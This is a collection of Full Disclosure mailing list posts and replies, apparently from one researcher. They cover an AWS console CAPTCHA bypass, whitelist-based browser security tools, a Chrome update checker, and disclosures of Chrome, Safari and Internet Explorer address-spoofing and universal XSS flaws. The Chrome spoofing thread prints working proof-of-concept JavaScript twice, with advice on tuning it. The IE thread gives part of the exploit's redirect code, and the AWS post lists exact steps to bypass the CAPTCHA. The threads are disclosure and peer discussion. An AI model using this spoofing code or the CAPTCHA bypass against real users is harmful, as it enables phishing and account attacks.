[FD] Request For Comment: Possible Flaw of Bypassing CAPTCHA in AWS Login?
The process of AWS login has a feature: if you use "fresh" browser(no cookie,
no cache, etc) to sign in, put correct email and correct password there,
CAPTCHA is required("To better protect your account, please re-enter your
password and then enter the characters as they are shown in the image below").
And I accidentally noticed this feature can be easily bypassed:
MY SYSTEM
Knoppix 7.6.0 on Read-Only USB Stick - always "fresh" upon booting
Chromium 46 - not the latest
"US-WEST-2" EC2 Instance as proxy - always the same IP
MY STEPS
1. Use Chromium to visit https://console.aws.amazon.com/
2. Put correct email and correct password there, and sign in
3. CAPTCHA is required
4. Clear cookie cache etc in Chromium
5. Use Chromium under "Lock Browser"(lockbrowser.com) with
"txt/https-whitelist.txt" configured as the following:
--
amazon.com
d3rrzw75sdtfe5.cloudfront.net
d3a94n0r6dqtjm.cloudfront.net
d2q66yyjeovezo.cloudfront.net
d3rn69q7afuxu6.cloudfront.net
d257l1zb7u5fh9.cloudfront.net
--
6. Visit https://console.aws.amazon.com/ ... it should be an ugly page because
CSS etc fails to load.
7. Put correct email and correct password there, and sign in
8. CAPTCHA is NOT required
ABOUT
I noticed this weird thing because I'm super lazy - don't add domains to
whitelist if it works. Later, I thought, "oops, CAPTCHA is gone". Of course, I
contacted Amazon, and they said it's not a bug.
REQUEST FOR COMMENT
1. Can you reproduce this?
2. Is this thing a bug or not?
Kind Regards,
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lock Browser 5.3 (Browser Security, Open Source, Python)
SUMMARY
This open source tool strictly controls what web browser can access, which
stops web browser from loading harmful content - Phishing, Non-Secure HTTP, or
whatever that's not in your whitelist.
SITUATION
"Security flaws in Google Chrome, Microsoft Edge, and Apple Safari were all
successfully exploited... browsers as well as Windows, OS X, and Flash"
http://venturebeat.com/2016/03/18/pwn2own-2016-chrome-edge-and-safari-hacked-460k-awarded-in-total/
ATTACK
Attacks have to make target's browser load attacker's website, which has two
scenarios - send the link(phishing), or control a website that target will
visit. The latter is difficult because web servers are usually(not always) much
more secure than web browsers, and attackers simply don't know which websites.
The former, Phishing, is "mainstream", because it's a lot easier: the address
of email sender can be faked, the content of email can look 100% legitimate and
compelling, and the URL can hide behind redirection service("dereferer" of
email system, t.co, or whatever).
SOLUTION
Whitelist - for example, the whitelist contains Gmail, PayPal, Chase, GitHub,
and Twitter. Attacker's website is not in the whitelist, so the harmful content
does not reach browser, even if some users are "stupid enough" to click links
from The Phishing Guy.
URLs
Project Home Page: https://www.lockbrowser.com/
Source Code: https://www.lockbrowser.com/source/
HISTORY
It's fork of HTTPS Only released in March:
http://seclists.org/fulldisclosure/2016/Mar/77
And this is likely the last version - because the source code is so short and
simple, maybe there is really no bug here! Let me hope so.
Kind Regards,
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)
To secure browser which is very fragile, the approach of HTTPS Only 3.1 is exceptionally simple: 1. Only HTTPS URLs(no other protocols) 2. Whitelist of domains(anything outside of whitelist is blocked) Now, let's look at threats: 1. Man in the middle - it's fixed. 2. Phishing always requires the browser to load attacker's website, so it's permanently dead here. 3. Drive-by Download - dead(if applied strictly, unable to download the executable) 4. Clickjacking - dead(attacker's web page is unreachable) 5. Address Spoofing - dead too(just unable to load the fake content) 6. XSS - almost dead(for attacker, the XSS vulnerability has to be GET, because POST requires attacker's HTML) 7. CSRF - almost dead(for attacker, the CSRF vulnerability has to be GET, and modern web applications simply don't do important things in GET, because it can be bookmarked etc, too dangerous) URLs: Project Home Page: https://www.httpsonly.net/ View Source Code: https://www.httpsonly.net/source/ Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)
When we browse the web, top threats are: 1. Remote code execution - everything is lost 2. Man in the middle - sniffing, and tampering 3. Phishing - simple, old, and still quite useful 4. Cross site scripting - data of the vulnerable domain is lost 5. CSRF - unauthorized action So, what if the browser can only access HTTPS of whitelist domains? With HTTPS, "man in the middle" is fixed. And with the whitelist, other attacks become very difficult, some even become impossible(such as phishing). Phishing is a huge headache in this era, because URLs can be hidden in legitimate redirection(such as t.co). That's why we made this simple tool(really simple - less than 200 lines of Python and JavaScript): Project Home Page - https://www.httpsonly.net/ Source Code - https://github.com/httpsonly/httpsonly Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)
(@moderators The original post was too brief. This one has details.) Summary This tool completely locks browser - just HTTPS, nothing else. This tool is extremely simple - less than 100 lines of code(Python and JavaScript). Why Firefox Add-on Firesheep Brings Hacking to the Masses http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html "Firesheep is basically a packet sniffer that can analyze all the unencrypted Web traffic" (Quite a while ago, it's become a "casual game") Yes, Mozilla said, "Gradually phasing out access to browser features for non-secure websites", in April 2015. After more than six months, they have done nothing useful. The Chrome team wanted the same stuff: https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure Again, nothing significant has been achieved yet. And there is HTTPS Everywhere, with SO MANY rules: https://www.eff.org/https-everywhere/atlas/ It's still able to access HTTP by default, but there is "Block all HTTP requests". The problem: nothing happens when browser tries HTTP - there should be warning(it's incorrect behavior) and options(try HTTPS, Google Cache, etc). People complained, months ago: https://github.com/EFForg/https-everywhere/issues/1329 How PAC(Proxy auto-config) is used: If it's HTTPS, that's fine. If it's HTTP, user gets warning and options(try HTTPS, Google Cache - it has HTTPS, etc). Anything else, it goes to 0.0.0.0 It's a simple tool that does one job, and does it very well. URLs https://httpsonly.github.io/ https://github.com/httpsonly/httpsonly Best Wishes, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open source tool for applying Google Chrome security updates
The Problem If you are a network administrator, keeping browser updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China(no Google services), updating Chrome is not an easy task. The Solution The official blog of Chrome Releases contains a lot of information. Code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether visitor's Chrome is exactly the same. Security The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript. URLs Source Code https://github.com/windowschrome Home Page http://www.windowschrome.com/ Latest Stable Chrome http://www.windowschrome.com/data/version.txt ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing - Google's Opinion
It's public now: https://code.google.com/p/chromium/issues/detail?id=497588 Interesting Points: They did reproduce "I can reproduce this locally" They say it's DoS "seems like any renderer denial-of-service" (The browser does not crash!) They say it's not security issue "remove security flags from this bug" Finally, they stopped replying "Jun 10" to "Jul 2" (unbelievable huge delay) In the end, they get it "Lots of phishing attacks these days tell you to call a phone number" "No interactions" Currently, it's "Severity-Medium". Kind Regards, PS http://dieyu.org/ Updated! ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
http://seclists.org/fulldisclosure/2015/Jun/109
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!
http://seclists.org/oss-sec/2015/q3/0
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!
http://seclists.org/oss-sec/2015/q2/824
Daniel Micay said:
"It does display a window with the oracle.com address"
"why you've got an ever increasing number of setTimeout events"
http://seclists.org/oss-sec/2015/q2/823
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" does NOT need to be increasing forever.
OK, I admit - we are lazy(it works and we don't touch it anymore)
:-)
http://seclists.org/oss-sec/2015/q3/2
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png
And Chrome
http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png
(A number is displayed in Chrome's address bar,
not the same as Opera)
http://seclists.org/oss-sec/2015/q2/826
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
http://seclists.org/oss-sec/2015/q3/4
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.
http://seclists.org/oss-sec/2015/q3/5
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
https://en.wikipedia.org/wiki/Main_Page
It works.
In fact, it works BETTER against HTTPS,
because HTTPS is slower, so timing is easier.
http://seclists.org/oss-sec/2015/q2/825
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.
In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do
"BBB Accredited Business"
"PayPal Partner"
etc.
Kind Regards,
PS
We love clever tricks.
We love this:
http://dieyu.org/
On 2015/6/30 7:08, David Leo wrote:
Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)
Note:
No user interaction on the fake page.
Code:
* index.html
function next()
{
w.location.replace('<a rel="nofollow" href="http://www.oracle.com/index.html">http://www.oracle.com/index.html</a>?'+n);n++;
setTimeout("next();",15);
setTimeout("next();",25);
}
function f()
{
w=window.open("content.html","_blank","width=500 height=500");
i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
Go
* content.html
This web page is NOT oracle.com
location="<a rel="nofollow" href="http://www.oracle.com/index.html"">http://www.oracle.com/index.html"</a>;;
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)
Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash(not DoS),
and the threat is obvious.
What's your opinion?
Kind Regards,
PS
We love clever tricks.
We love this:
http://dieyu.org/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)
Note:
No user interaction on the fake page.
Code:
* index.html
function next()
{
w.location.replace('http://www.oracle.com/index.html?'+n);n++;
setTimeout("next();",15);
setTimeout("next();",25);
}
function f()
{
w=window.open("content.html","_blank","width=500 height=500");
i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
Go
* content.html
This web page is NOT oracle.com
location="http://www.oracle.com/index.html";;
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)
Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash(not DoS),
and the threat is obvious.
What's your opinion?
Kind Regards,
PS
We love clever tricks.
We love this:
http://dieyu.org/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Safari Address Spoofing (How We Got It)
Great blog, Michal! If you change "http://1.2.3.4/"; in your Safari code: some URL in the real world(for example, dailymail.co.uk). Your code won't work(page of target domain is simply loaded). The trick here is: "keep trying to load". Kind Regards, __ BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. On 2015/5/31 23:09, Michal Zalewski wrote: Well... http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html On Thu, May 28, 2015 at 10:47 PM, David Leo wrote: Proof of concept: http://www.deusen.co.uk/items/iwhere.9500182225526788/ It works on fully patched versions of iOS and OS X. How it works: Just keep trying to load the web page of target domain. How We Got It: Safari changes address bar to new URL, BEFORE new content is loaded. BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Safari Address Spoofing (How We Got It)
Proof of concept: http://www.deusen.co.uk/items/iwhere.9500182225526788/ It works on fully patched versions of iOS and OS X. How it works: Just keep trying to load the web page of target domain. How We Got It: Safari changes address bar to new URL, BEFORE new content is loaded. BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
'could you share the contents of "1.php"?'
Sure:
http://www.dailymail.co.uk/robots.txt";);
?>
"I'm assuming it is a delayed re-direct to the target's domain?"
Exactly. :-)
"the cloudflare scripts"
It's been tested without them.
Kind Regards,
On 2015/2/6 2:31, Barkley, Peter wrote:
Thanks Zaakiy,
I'm able to get the hacked page on IE9 after changing the document mode from
Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around
having to manually switch the document mode with the appropriate DOCTYPE set in
the exploit html page.
David, could you share the contents of "1.php"? I'm assuming it is a delayed
re-direct to the target's domain? I am unable to reproduce the exploit locally with the
same code (assuming my 1.php is correct), though without the cloudflare scripts.
Thanks,
Peter
Peter Barkley | Senior Security Intelligence Analyst | Security Operations
Centre | Royal Bank of Canada
-Original Message-
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of
Zaakiy Siddiqui
Sent: 2015, February, 04 6:46 PM
To: David Leo; Joey Fowler
Cc: fulldisclosure@seclists.org; b...@securitytracker.com;
bugt...@securityfocus.com; cve-ass...@mitre.org
Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
Hi David,
Nice one…great find! And thanks Joey for confirming the bypass of
HTTP-to-HTTPS restrictions.
I can confirm that this also affects Spartan Browser (Experimental enabled in
about:flags in Internet Explorer 11).
I can also confirm that IE 10 is affected.
IE 9 appears to not be vulnerable. Screenshots below.
Regards,
Zaakiy Siddiqui
IE 11 Spartan - vulnerable (Windows 10)
[cid:Image1466.png@14b56f08dd75bb]
[cid:Image1487.png@14b56f6487b5d0]
IE 10 - vulnerable (Windows 7)
[cid:Image1485.jpg@14b56f5f5025ce]
IE 9 - not vulnerable (Windows 7)
[cid:Image1503.jpg@14b56fa3c785e0]
From: David Leo<mailto:david@deusen.co.uk>
Sent: Wednesday, 4 February 2015 11:13 PM
To: Joey Fowler<mailto:j...@tumblr.com>
Cc: bugt...@securityfocus.com<mailto:bugt...@securityfocus.com>,
fulldisclosure@seclists.org<mailto:fulldisclosure@seclists.org>,
b...@securitytracker.com<mailto:b...@securitytracker.com>,
cve-ass...@mitre.org<mailto:cve-ass...@mitre.org>
Microsoft was notified on Oct 13, 2014.
Joey thank you very much for your words.
Kind Regards,
On 2015/2/3 4:53, Joey Fowler wrote:
Hi David,
"nice" is an understatement here.
I've done some testing with this one and, while there /are/ quirks, it most
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.
As long as the page(s) being framed don't contain X-Frame-Options headers (with
`deny` or `same-origin` values), it executes successfully. Pending the payload
being injected, most Content Security Policies are also bypassed (by injecting
HTML instead of JavaScript, that is).
It looks like, through this method, all viable XSS tactics are open!
Nice find!
Has this been reported to Microsoft outside (or within) this thread?
--
Joey Fowler
Senior Security Engineer, Tumblr
On Sat, Jan 31, 2015 at 9:18 AM, David Leo mailto:david@deusen.co.uk>> wrote:
Deusen just published code and description here:
http://www.deusen.co.uk/items/__insider3show.3362009741042107/
<http://www.deusen.co.uk/items/insider3show.3362009741042107/>
which demonstrates the serious security issue.
Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk <http://dailymail.co.uk> can be changed by
external domain.
How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk
<http://dailymail.co.uk>.
Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject
anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7
If you like it, please reply "nice".
Kind Regards,
_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/__listinfo/fulldisclosure
<https://nmap.org/mailman/listinfo/fulldisclosure>
Web Archives & RSS: http://seclists.org/__fulldisclosure/
<http://seclists.org/fulldisclosure/>
___
If you received this email in error, please advise the sender (by return email
or otherwise) immediately. You have consented to receive the attached
electronically at the above-noted email address; please
[FD] Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"
1. "Spartan - vulnerable (Windows 10)" http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png Thanks to Zaakiy Siddiqui! 2. http://www.dailymail.co.uk/robots.txt";); ?> Many asked for it. 3. It's Universal XSS, as we tested: Not only dailymail.co.uk - also Yahoo etc Not only injecting content - also getting private info etc. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
"is this entirely an IE flaw"
Yes.
"is it tied to the use of Cloudflare"
No.
"I tried to reproduce... was unsuccessful"
Likely, this detail is missing:
http://www.dailymail.co.uk/robots.txt";);
?>
Please tell us whether you reproduce(with the PHP code).
"am I correct... JavaScript hosted on shared domains"
In the demo, it's first injected into page without any JavaScript.
(robots.txt)
"I don't have time to to a teardown on CloudFlare.JS"
Honestly we don't even know such file exists :-)
We uploaded and took a screenshot - that's all.
"it's a very impressive exploit"
Thanks.
'make sure the label "universal" is actually justified'
It has also been tested against Yahoo etc.
"Sorry if this has already been discussed elsewhere"
Many asked - for example:
http://www.milw00rm.com/exploits/7057
Again, please tell us whether you reproduce with the PHP code.
Kind Regards,
On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote:
So here's a possibly stupid question: is this entirely an IE flaw, or is it
tied to the use of Cloudflare by the targeted site as well as the attacking
site?
I ask because:
1 - I tried to reproduce the attack in a number of ways without using
CloudFlare, and was unsuccessful.
2 - Since I don't have access to a CloudFlare account, I used Burp to do a find/replace for proxied
response headers and bodies on "www.dailymail.co.uk" and then "dailymail.co.uk"
with a target domain which does not use Cloudflare, then accessed the Deusen demo page. The
injection attempt failed.
3 - I then used Burp in the same way, but replaced
"www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which *does* use
CloudFlare, and the injection attempt succeeded.
If this is true, am I correct in thinking that while this definitely involves a
vulnerability in IE, it also depends at least on targeting website owners who
use JavaScript hosted on shared domains (CloudFlare, in this case), which is
inherently riskier than hosting it all on one's own domain due to the way
cross-domain security works in modern browsers?
I don't have time to to a teardown on CloudFlare.JS, but does this also depend
on some sort of code vulnerability in that file?
Even if one or both of those caveats are true, it's a very impressive exploit, but I'd
like to make sure the label "universal" is actually justified.
Sorry if this has already been discussed elsewhere. I couldn't find anything
when I looked.
- Ben
On 2015-02-02 12:53, Joey Fowler wrote:
Hi David,
"nice" is an understatement here.
I've done some testing with this one and, while there *are* quirks, it most
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.
As long as the page(s) being framed don't contain X-Frame-Options headers
(with `deny` or `same-origin` values), it executes successfully. Pending
the payload being injected, most Content Security Policies are also
bypassed (by injecting HTML instead of JavaScript, that is).
It looks like, through this method, all viable XSS tactics are open!
Nice find!
Has this been reported to Microsoft outside (or within) this thread?
--
Joey Fowler
Senior Security Engineer, Tumblr
On Sat, Jan 31, 2015 at 9:18 AM, David Leo wrote:
Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.
Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.
How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into
dailymail.co.uk.
Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject
anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7
If you like it, please reply "nice".
Kind Regards,
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
Microsoft was notified on Oct 13, 2014.
Joey thank you very much for your words.
Kind Regards,
On 2015/2/3 4:53, Joey Fowler wrote:
Hi David,
"nice" is an understatement here.
I've done some testing with this one and, while there /are/ quirks, it most
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.
As long as the page(s) being framed don't contain X-Frame-Options headers (with
`deny` or `same-origin` values), it executes successfully. Pending the payload
being injected, most Content Security Policies are also bypassed (by injecting
HTML instead of JavaScript, that is).
It looks like, through this method, all viable XSS tactics are open!
Nice find!
Has this been reported to Microsoft outside (or within) this thread?
--
Joey Fowler
Senior Security Engineer, Tumblr
On Sat, Jan 31, 2015 at 9:18 AM, David Leo mailto:david@deusen.co.uk>> wrote:
Deusen just published code and description here:
http://www.deusen.co.uk/items/__insider3show.3362009741042107/
<http://www.deusen.co.uk/items/insider3show.3362009741042107/>
which demonstrates the serious security issue.
Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk <http://dailymail.co.uk> can be changed by
external domain.
How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk
<http://dailymail.co.uk>.
Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject
anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7
If you like it, please reply "nice".
Kind Regards,
_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/__listinfo/fulldisclosure
<https://nmap.org/mailman/listinfo/fulldisclosure>
Web Archives & RSS: http://seclists.org/__fulldisclosure/
<http://seclists.org/fulldisclosure/>
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.
Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.
How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into
dailymail.co.uk.
Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything
into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7
If you like it, please reply "nice".
Kind Regards,
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
